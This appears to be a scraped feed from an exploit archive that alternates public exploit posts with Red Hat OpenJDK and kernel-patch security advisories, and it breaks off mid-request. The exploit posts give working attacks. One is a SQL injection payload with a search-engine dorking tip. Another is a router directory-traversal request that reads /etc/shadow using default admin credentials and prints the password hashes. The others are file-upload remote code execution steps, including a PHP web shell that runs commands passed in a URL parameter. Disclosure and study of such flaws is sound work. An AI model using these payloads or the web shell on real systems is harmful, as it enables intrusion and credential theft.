CMS porViaX version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS porViaX v2.0 Sql Injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit)                                             | | # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : noticias?pg=\[+] http://127.0.0.1/muritiba.ba.govbr/noticias?pg=%5c <==== inject here[+] Login http://127.0.0.1/muritiba.ba.govbr/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS porViaX 2.0 SQL Injection

Red Hat Security Advisory 2023-4208-01 - The OpenJDK 11 packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. This release of the Red Hat build of OpenJDK 11 for portable Linux serves as a replacement for the Red Hat build of OpenJDK 11 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK security update  
Advisory ID:       RHSA-2023:4208-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4208  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22045 CVE-2023-22049 CVE-2023-25193   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 11 packages provide the OpenJDK 11 Java Runtime Environment and  
the OpenJDK 11 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 11 (11.0.20) for portable  
Linux serves as a replacement for the Red Hat build of OpenJDK 11 (11.0.19)  
and includes security and bug fixes, and enhancements. For further  
information, refer to the release notes linked to in the References  
section.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

5. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTHiAAoJENzjgjWX9erE++gQAIo9XD08xW0skEZq39psOlRS  
pLsBQCe1YvquKhFbl2Lz5LUxLEg+R4P5UmRYcmzrd+uRcEgAG3gR7W74//GbQF2j  
1nIivbiKbkxPiQikHMfwGXp0p9Mryi+irkxn1Z0U1k/vahT2VMgqtOOnSDefShUA  
DHORfdLmCRvikRTFU5P8Q//PMywiAdolvewiC2d0JezJkAaVRYpr5+Eq9aKQVbqv  
JoWtKkd4fr13rv5PHLciwaD2cVumLjb3uBCSOEF7QKpbtSCE44jH5TIL+zB43PN0  
dA8M/fIaHBh6gc9/pIHz+qZiiDLPDFLDlSNoTR1Da484uBh5ukKeljPQgslah51m  
x5bgbBNPg/NH2dXTNZVHmYE28NoCoVQS6OdvNJC2pjiVSXusHt+xvaU8ZG9B23wd  
WgLCaszQ1+v9yHSk5KF9qYEGIJvhVI6/7eG85fP48LWTA5wq5bh8wtl4Z7s173Y+  
TGti6qH7oxMm17sPtDiSdehD2sA52efMpOqhs2toKikY4Rl4L5KL9MUCcqkxzmZ3  
6OpOycsdoPcaB16Q3G0EJTmfKhOw8E6XMFuqNsNITBshae090qvzSJ3UMyRmi+la  
AjUSOU8yRkex+wxc/NOfeTshxh12yPOA+Pfxw5AOgSHWeTxNg4a1yQ8nJLMof+Y5  
9ZNd2vkjWyyhqszJ7d/s  
=PwDo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4208-01

Red Hat Security Advisory 2023-4209-01 - The OpenJDK 8 packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. This release of the Red Hat build of OpenJDK 8 for portable Linux serves as a replacement for Red Hat build of OpenJDK 8 and includes security and bug fixes as well as enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK 8u382 Security Update for Portable Linux Builds  
Advisory ID:       RHSA-2023:4209-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4209  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22045 CVE-2023-22049   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 8 packages provide the OpenJDK 8 Java Runtime Environment and  
the OpenJDK 8 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 8 (8u382) for portable Linux  
serves as a replacement for Red Hat build of OpenJDK 8 (8u372) and includes  
security and bug fixes as well as enhancements. For further information,  
refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)

5. References:

https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTHcAAoJENzjgjWX9erEgXIQAJFZECxj9oL3NpeYArIzAqmF  
zkUNECAYxx3NGvjH1cIdmWX0Y2Xm8qZ52NgN6cQ0/yHKKiPi8Q+vm/beHJrhoGMh  
qMbFskp5vL81C8day7wcbZWj8KFtk3w7vNrsp2KK+m6nNE4dqCQOdg1ecgVYmUmV  
O3j7R8LqVZzQcNGpfpLd1ecIvJYAjISSQ/V0lUQshOS+weYfrNfxGRKdtOjbTAhc  
5E7lRpdn+KvAVJNl7uHSF/saRD8uJiyZZ1DkYI5hLH7sWcvoRXQmiK5OqLFO2UQk  
ocwYHgVfOkkCNZaplqa+6J7J2zpba4n+DMYAnKtPmNNVhhaBVXcElRRQ05IG9Fbu  
VxDHuFOhbonyBWvz6A+siDR0YDYbSt731oVcGORIdYAePzy80r1E34YffbeZwy4o  
9CqnST0rwjZcCC3wB62lIzAngbzwhVyN+hjfIS++K8tpaT0RYsSvCSZ7KX8Hqime  
GNMXkN65NUU2d2DtIxTifIdn2nTm2VGX/3efXzv8Z7/w14b6ANmHVQY7hZ3R0VAi  
Q7DL9wYCKghF+xHPCKngawGKjCb0hldQVKFQuhCCsh7ZXKG6eCWpSeq7s5DUChC9  
4+fq01yz5Z6g9mRHohUxovyjW4PG9SydoLsDqaIAmLCu3OlAtLd7NN8dNsw/U7Hj  
91AxhXf7MNGg+9YAD97Q  
=TF5g  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4209-01

TP-Link TL-WR740N suffers from a directory traversal vulnerability.

# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal# Date: 13/7/2023# Exploit Author: Anish Feroz (Zeroxinn)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N---------------------------POC---------------------------Request-------GET /help/../../../etc/shadow HTTP/1.1Host: 192.168.0.1:8082Authorization: Basic YWRtaW46YWRtaW4=Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeResponse--------HTTP/1.1 200 OKServer: Router WebserverConnection: closeWWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"Content-Type: text/html<META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><HTML><HEAD><TITLE>TL-WR740N</TITLE><META http-equiv=Pragma content=no-cache><META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"><LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"><SCRIPT language="javascript" type="text/javascript"></SCRIPT>root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::bin::10933:0:99999:7:::daemon::10933:0:99999:7:::adm::10933:0:99999:7:::lp:*:10933:0:99999:7:::sync:*:10933:0:99999:7:::shutdown:*:10933:0:99999:7:::halt:*:10933:0:99999:7:::uucp:*:10933:0:99999:7:::operator:*:10933:0:99999:7:::nobody::10933:0:99999:7:::ap71::10933:0:99999:7:::

TP-Link TL-WR740N Directory Traversal

Red Hat Security Advisory 2023-4212-01 - The OpenJDK 8 packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. This release of the Red Hat build of OpenJDK 8 for Windows serves as a replacement for the Red Hat build of OpenJDK 8 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK 8u382 Windows Security Update  
Advisory ID:       RHSA-2023:4212-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4212  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22045 CVE-2023-22049   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 8 packages provide the OpenJDK 8 Java Runtime Environment and  
the OpenJDK 8 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 8 (8u382) for Windows serves  
as a replacement for the Red Hat build of OpenJDK 8 (8u372) and includes  
security and bug fixes, and enhancements. For further information, refer to  
the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)

5. References:

https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTHYAAoJENzjgjWX9erElasP/iZapL9ChMEdCkGCpOybL9cz  
mft19WCuPSC/vigXrlzqaxnMZxE890duPL6aaL/ZWel4yStpVTOG069kz2ohIA2P  
scL7NQFVVDBRve0H771v/8xqlolxWhVhVc4P6YK7FXMgCB1k90l/xxPma7tXo/t0  
UduVUgFPGIkvA2kpmWORWfMkVS5yCuzpx7EICewQRDm11DMcRugl4yIOGDt6NoTC  
IVIgP6GMU7AdWuaBtN88baeQfxHN5MMLZDc/oS9Cr84YDOUR3bDsArQqLez2Mk/D  
WfyHyN6zTocsdPqsm9VheMH4nSsIM81D5YVM/eV3acJy3ZTYi4Kw4uK1nebggPJ3  
/ZNGmAltzkLzIaNWVZ8zVmDmp886FlgXzW08bh/AU+JXKEv2S3zQ56Xj4w4E0IAx  
nWzXmx9kAzTImbpAuTxH811SXJWiM+nMr+Hd9XIlSbm1Fx+cjItsx6XGMc5loq8V  
wLswF5vJ3GdMeybbSdgDsumbsSEHjgyblNob9GFkJ+4glkPiAqzLmj3bbJkSSmVx  
iqLL8NSHjGcN/8wABXTiTsYxP0hIeFz0goW6sEbhmfbhFdq5F3hMWvAwMeb9JjOY  
BXVe6el6PMI5k3AMn4yZ+ebsFFkXugtHtJowUh+vg8J9MRW+k0qQkFY45EPr4FFi  
7yoyHMsR+IpwYkstrZy9  
=Qo+C  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4212-01

Red Hat Security Advisory 2023-4161-01 - The OpenJDK 11 packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. This release of the Red Hat build of OpenJDK 11 for Windows serves as a replacement for the Red Hat build of OpenJDK 11 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK 11.0.20 Security Update for Windows Builds  
Advisory ID:       RHSA-2023:4161-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4161  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22045 CVE-2023-22049 CVE-2023-25193   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 11 packages provide the OpenJDK 11 Java Runtime Environment and  
the OpenJDK 11 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 11 (11.0.20) for Windows  
serves as a replacement for the Red Hat build of OpenJDK 11 (11.0.19) and  
includes security and bug fixes, and enhancements. For further information,  
refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

5. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTHPAAoJENzjgjWX9erEuw4P/2XfOc8Rt0C/V1WjuY8F3VQQ  
p4z28aKHptQlfIpfjhJaF5GSBz3CbLNrhfxRPViUfRU4bg91XhUCGZbvl+fHkP8z  
QxRrJze0Z1aXwbn9J0JEUqPrx2dSEdfg2um+5TPK/I8vLjhaYMQgmQxZS/8Lsg6L  
iymhiA/+qRn5ylP92DJgZFTM6LAL9CMcESJQbas7CzM2UA76Q+/W3R3FIVt/YnnX  
vzRK3Qof7nnr2n9txDs6FEQzX2Y+HD7g5oS2BSIRlxtC/4h4WhA9KVjaehgqWPKD  
56vUK7RHXIviaVU6tPABApdtnrWCP1vwE6sv26ssKBnCXeUT3JujljwLWe6L+cQk  
gvJTJV1t9XBklnF08auyQt0eMo9IUeiFKvS1eVSP8acTaDrxeL5TbdCTA3mKWY6H  
G0SZF2AXTqsVrCMpMKk9rykzBSN/jsbHjMvNwBDelEKZv1+eYenEG1m2ML+rctN5  
UB8s8la3uSbNdMy8ppTpJHB4xrral1fCbsvZ/LsyOmjIINs8ff7CtKCALjhCYL3J  
EEue9itY8r98Q4lCtOQqo+7/60LjZc7QJ2FUJQg6J3lzBy2xYH974tzVa2065KLC  
IGu6VXL37pTDP8ZA+dAxqC3YFwcma+u8rE7U2zm3EoQLdrVXP6xbPHEufb/lDt84  
RyHcX4fEMNKOMifuxGvi  
=AWIJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4161-01

Red Hat Security Advisory 2023-4230-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:4230-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4230  
Issue date:        2023-07-20  
CVE Names:         CVE-2022-42896   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.9.0) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kpatch-patch-5_14_0-70_36_1-1-6.el9_0.src.rpm  
kpatch-patch-5_14_0-70_43_1-1-5.el9_0.src.rpm  
kpatch-patch-5_14_0-70_49_1-1-4.el9_0.src.rpm  
kpatch-patch-5_14_0-70_50_2-1-3.el9_0.src.rpm  
kpatch-patch-5_14_0-70_53_1-1-2.el9_0.src.rpm  
kpatch-patch-5_14_0-70_58_1-1-1.el9_0.src.rpm

ppc64le:  
kpatch-patch-5_14_0-70_36_1-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-debuginfo-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-debugsource-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-debuginfo-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-debugsource-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-debuginfo-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-debugsource-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-debuginfo-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-debugsource-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-debuginfo-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-debugsource-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_58_1-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_58_1-debuginfo-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_58_1-debugsource-1-1.el9_0.ppc64le.rpm

x86_64:  
kpatch-patch-5_14_0-70_36_1-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-debuginfo-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-debugsource-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-debuginfo-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-debugsource-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-debuginfo-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-debugsource-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-debuginfo-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-debugsource-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-debuginfo-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-debugsource-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_58_1-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_58_1-debuginfo-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_58_1-debugsource-1-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTHLAAoJENzjgjWX9erEdXUQAKdrgMCTwiPKFG0mS7QBjPe+  
O2JE1vITnL1btLp7RMG/GKQA25HfqI5aTa2eEpfRqhtjLDs5CW4oZy367B1y9byl  
P4uzZ3CJ/iOx3UHZ9UPh+NTm4JftVtzReshjg5dTrDagqn7Wu0rfKC403Rp6+6Nd  
/k22tDcKU449ICb6p4Ch2bAGHCIPwzWovBA1x/zCEEuAQb9dpDa1kCBbNrc/69Dt  
ewCE77cBVIdAru62TEJUZwHOb8ZJZq/UIAC9PafIKOzhcz8qYmG6Y5fXhFJd9N/H  
TNyRySuEWK/MqJLucMipbH8c4On4tykYKA2xrt8Vk0BT8w32tcApX6Zgz3AuRtqH  
qFDSrwbH/HW9aF3nxzf3CZQWy+y4H4xT5BGbOBN/diH36lPl5IzHEikZj47frjpF  
mZXEb4gKR/701jA2AUSn06H3ATl7rhRQjNiQ20CP1GVdxjZWV8CpaIkDzA851NxU  
FOY8jX8mqxWzRuK5wFl6XENhGeo6aceJ1cPFja77QuxOmyEnn4JmjStjWND/nLrI  
1HVFB8rLUzMAAOi82+OsBbfRiwbTi2UqfCnfQmeUToT3eEVGVC1JC+clvWKGLaGT  
ficagdT9LaNMdZMecIy1gw/hqNer+on72DmPPgcHfOkh4n+WYyQKbGtmqnpeQZRy  
3E8L2g6R0gi6Fp5Oeo97  
=CXpx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4230-01

Pluck version 4.7.18 appears to suffer from a remote shell upload vulnerability.

    ## Title: pluck-4.7.18 - FI + RCE.## Author: nu11secur1ty## Date: 07.19.2023## Vendor: https://github.com/pluck-cms/pluck/wiki## Software: https://github.com/pluck-cms/pluck## Reference: https://portswigger.net/daily-swig/rce## Reference: https://portswigger.net/web-security/file-upload## Description:The attacker who already has an account can upload a fake module tothe system and can execute the content from this moduleon the server. In this example, the attacker executes an info filefrom the already fake uploaded module and gets all information forthis system. This is a CRITICAL Vulnerability.The problem is that these developers are not making a strongsanitizing upload function and do not restrict the execution frominsideof the server.## Staus: HIGH Vulnerability[+]Exploit: prostak.php- - - NOTE: The attacker also can upload an EXE file, which file hecan execute or download!```php<?php// by nu11secur1ty - 2023  phpinfo();?>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pluck/2023/pluck-4.7.18)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/pluck-4718-fi-rce.html)## Time spend:00:35:00

Pluck 4.7.18 Remote Shell Upload

Blackcat CMS version 1.4 suffers from a remote shell upload vulnerability.

    Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)Application: blackcat CmsVersion: v1.4Bugs:  RCETechnology: PHPVendor URL: https://blackcat-cms.org/Software Link: https://github.com/BlackCatDevelopment/BlackCatCMSDate of found: 13.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?>4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwdPoc requestPOST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1Host: localhostContent-Length: 577Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: 